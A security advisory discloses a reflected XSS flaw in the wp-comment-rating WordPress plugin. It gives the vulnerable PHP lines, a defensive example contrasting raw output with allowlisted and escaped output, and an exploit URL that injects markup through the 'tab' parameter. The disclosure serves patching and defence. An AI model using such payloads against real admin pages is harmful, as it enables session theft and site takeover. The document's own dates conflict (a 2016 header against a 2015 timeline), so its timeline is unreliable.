WP-Comment-Rating XSS Vulnerability

## FULL DISCLOSURE

#Product : wp-comment-rating
#Exploit Author : Rahul Pratap Singh
#Version : 1.5.0
#Home page Link : http://codecanyon.net/item/wordpress-comment-rating-plugin/6582710
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 30/Jan/2016

XSS Vulnerability:

—————————————-
Description:
—————————————-
The "tab" query parameter is neither validated nor escaped before being echoed into an HTML attribute, which leads to reflected XSS on the plugin's admin page.

—————————————-
Vulnerable Code:
—————————————-
File Name: wpb_plugin_admin_page.php

line:194
$this->current_tab = isset( $_GET['tab'] ) ? $_GET['tab'] : '';

line:553
$active_tab = $this->current_tab;

line:558
$active_tab = isset( $this->tabs[0] ) && empty( $active_tab ) ? $this->tabs[0]->get_id() : $active_tab;

line:561
<div class="wrap wrap-<?php echo $this->page_hook . ' active-tab-' . $active_tab; ?>">
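As an added illustration (this is not the plugin's code), the following stand-alone PHP script reproduces the concatenation pattern from lines 194, 558 and 561 next to a hardened version that first restricts the value to the tab IDs the page actually defines and then escapes it for the HTML-attribute context. The tab names, the page hook value and the use of htmlspecialchars() in place of WordPress's esc_attr() are assumptions so the script runs without a WordPress install.

```php
<?php
// Added example, not the wp-comment-rating code: vulnerable rendering vs. hardened rendering.

// Constructed stand-in for the plugin's $this->tabs objects: the tab IDs the
// admin page knows about (names are assumptions, not the plugin's real tabs).
$known_tab_ids = ['general', 'display', 'advanced'];

// Constructed stand-in for $_GET['tab'], using the payload quoted in the advisory.
$untrusted_tab = '"><input type=text onclick=alert(/XSS/)><!--';

// Vulnerable pattern (mirrors lines 194 -> 558 -> 561): the raw query value is
// concatenated straight into a double-quoted class attribute, so a '"' in the
// input closes the attribute and the rest of the string becomes markup.
function render_vulnerable(string $page_hook, string $tab, array $tabs): string
{
    $active_tab = ($tab === '' && isset($tabs[0])) ? $tabs[0] : $tab;
    return '<div class="wrap wrap-' . $page_hook . ' active-tab-' . $active_tab . '">';
}

// Hardened version with two independent layers:
//  1. validate: only a value that names a defined tab is accepted; anything
//     else falls back to the first tab (the same default the plugin uses);
//  2. escape: the attribute value is encoded for the HTML-attribute context
//     regardless, so even a trusted-looking value cannot break out.
// In WordPress the escaping call would be esc_attr(); plain htmlspecialchars()
// with ENT_QUOTES is used here so the script runs stand-alone.
function render_hardened(string $page_hook, string $tab, array $tabs): string
{
    $active_tab = in_array($tab, $tabs, true) ? $tab : ($tabs[0] ?? '');
    $class      = 'wrap wrap-' . $page_hook . ' active-tab-' . $active_tab;
    return '<div class="' . htmlspecialchars($class, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '">';
}

echo "Vulnerable output (attribute closed, markup injected):\n",
     render_vulnerable('wpcommentrating', $untrusted_tab, $known_tab_ids), "\n\n";

echo "Hardened output, unknown tab rejected and defaulted:\n",
     render_hardened('wpcommentrating', $untrusted_tab, $known_tab_ids), "\n\n";

echo "Hardened output, legitimate tab accepted:\n",
     render_hardened('wpcommentrating', 'display', $known_tab_ids), "\n\n";

// Escaping on its own also neutralises the payload: the quote and angle
// brackets come out as entities and stay inside the attribute value.
echo "Escaping alone applied to the payload:\n",
     htmlspecialchars($untrusted_tab, ENT_QUOTES | ENT_HTML5, 'UTF-8'), "\n";
```

Run it with the PHP CLI (`php example.php`) and compare the four outputs. The allowlist is the fix that matters most for this parameter, since the page only ever needs one of a handful of known tab IDs; the escaping layer is what protects the output if a later change ever feeds a free-form value into the same template.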

—————————————-
Exploit:
—————————————-
GET /wp-admin/edit-comments.php?page=wpcommentrating&tab="><input type=text onclick=alert(/XSS/)><!--

—————————————-
POC:
—————————————-
[POC screenshot: wpcommentratingxsspoc]

Fix:
Update to 1.5.4

Vulnerability Disclosure Timeline:
→ January 24, 2015  – Bug discovered, initial report to Vendor
→ January 25, 2015  – Vendor Acknowledged
→ January 27, 2015  – Vendor Deployed a Patch

#######################################
#                    CTG SECURITY SOLUTIONS                          #
#                www.ctgsecuritysolutions.com                        #
#######################################

Pub Ref:
http://codecanyon.net/item/wordpress-comment-rating-plugin/6582710
